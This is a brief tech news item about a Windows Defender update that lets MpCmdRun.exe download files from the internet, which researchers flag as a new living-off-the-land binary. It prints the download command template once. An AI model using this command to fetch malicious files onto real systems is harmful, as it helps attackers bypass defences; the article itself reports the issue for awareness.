Windows Defender has added a new feature and security researchers are not too happy, as it has increased the attack surface of Windows.

Version 4.18.2007.9 or 4.18.2009.9 of the app has added the ability to download files via the command line using the app, e.g.

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

… can now be used to download a binary from the internet.

While not an exploit in itself, the feature allows a script which can launch the command line to import further files from the internet using native so-called living-off-the-land binaries or LOLBINs.

Adding the feature to Windows Defender means there is another app admins have to keep an eye on and another app which hackers can exploit.

Fortunately, Windows Defender does still scan the apps it downloads, but this is of course not infallible.

The new “feature” was discovered by security researcher Mohammad Askar and verified by BleepingComputer. Read more here.

Comments